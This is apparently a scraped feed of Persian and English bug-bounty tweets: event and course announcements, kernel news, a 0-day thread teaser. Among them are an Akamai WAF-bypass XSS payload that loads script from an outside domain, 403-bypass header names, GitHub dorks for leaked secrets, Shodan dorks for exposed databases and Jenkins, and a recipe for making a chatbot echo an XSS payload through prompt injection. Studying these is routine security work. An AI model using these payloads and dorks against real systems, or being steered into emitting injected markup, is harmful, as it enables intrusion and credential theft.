سلام، ۲۳ فروردین به مدت یک هفته یه ایونت هانت آنلاین داریم با جوایز نقدی خوب و غیرنقدی جذاب + لایو آموزشی امنیت (مناسب برای همه سطوح). شرکت بدون ثبت‌نام برای همه آزاده، جزئیات بیشتر رو بزودی اضافه می‌کنیم، وبسایت: voorivex.ir

ماشالله سلطان :)))

با توجه به اعلام Linus Torvalds کرنل 6.5 بزودی منتشر می شود. کلی ویژگی جدید اضافه و بهبود های مختلفی انجام شده، ولی چند مورد برای من مهمتر از بقیه موارد است، چون ارتباط با کار من(مستقیم و غیرمستقیم) دارد. توضیحات بیشتر در Linkedin: linkedin.com/posts/vahidnam… خلاصه در ادامه» ۱/۲

We found two 0-day vulnerabilities in @Ubuntu kernel and it all started by reading descriptions of old CVEs 📖 Thread about the discovery of #GameOverlay 🧵👇🏼

Firewall deployed

Hey ! Here is a little #Akamai #Bypass for your XSS :) Replace domain.tld by your own ;) kuromatae"><textarea/onbeforeinput=kuro=&#x27;//domain.tld&#x27;;import(kuro)%09autofocus%09x>

Google dorks for Content Discovery #bugbounty #bugbountytip

addons.mozilla.org/en-US/firefox/… I uploaded the Waybackurl add-on to the Mozilla repository. It can be useful for the recon. I'll soon upload it to Chrome as well. Don't forget to give it a 5-star rating. Further retweets are greatly appreciated. #BugBounty #bugbountytip

Daily Notes : Day 27 403 Bypass (Part 1) 1: bypass by fuzz or brute force 2: bypass by header names Base-Url Client-IP Http-Url Proxy-Host Proxy-Url Real-Ip Redirect Referer Referrer Refferer Request-Uri Uri Url X-Client-IP X-Custom-IP-Authorization X-Forward-For

و در نهایت خود من هم در تلاش برای ضبط دوره کامل wide recon برای بوتکمپOptizSec هستم.سعی کردم تمام و کمال مباحث رو پوشش بدم و براتون ی سورس خوب ارائه بدم! از پس فردا توی لایو های شبانه دیسکورد میبینمتون❤️‍🔥🦊 ریتوییت کنید خستگی هامون کم بشه🐢♥️ discord.gg/baJ4C7BsXK

🔥🔥Github-Dork🚀🚀🔥🔥 Happy Hunting 🔍 api_key 🔍 app_AWS_SECRET_ACCESS_KEY 🔍 app_secret 🔍 authoriztion 🔍 Ldap 🔍 aws_access_key_id 🔍 secret 🔍 bash_history 🔍 bashrc%20password 🔍 beanstalkd 🔍 client secre 🔍 composer 🔍 config 🔍 credentials 🔍 DB_PASSWORD 🔍 dotfiles

🚀🚀Shodan-Dork🚀🚀 🔍 Prodect mysql found 👉product:MySQL 🔍 MongoDB 👉"MongoDB Server Information" -authentication 🔍 defult password 👉"default password" 🔍 guest login 👉 guest login ok 🔍 Jenkins Unrestricted Dashboard 👉x-jenkins 200 🔍 wp config 👉http.html:"* The

شروع بوتکمپ عید با چهار دوره استارت خورد: اولی دوره رد تیم روی محوریت IA با تدریس mrpentst هستش. امشب ویدیو معرفی دوره فقط بخاطر محدودیت روزانه اپلود شد اما همین جلسه فوق‌العاده پر بار و عالی هستش از دستش ندید1/5 youtube.com/playlist?list=…

Search Engines For PenTesters

The Conviction Market just got funded! Led by cyber•Fund & Delphi Ventures with backing from some of the sharpest minds in the space with the highest conviction ;) Prediction markets were the prototype. Conviction Markets are the evolution. XO Market Here is my story: 🧵

XSS via Prompt Injection 💥🧠🔓 🤖 Find a chatbot 🧠 Ask what model it is 🔁 Get it to repeat text ⚠️ Make it say: '"><img src=x onerror=alert()> 💥 Escalate to Reflected/Stored XSS via URL param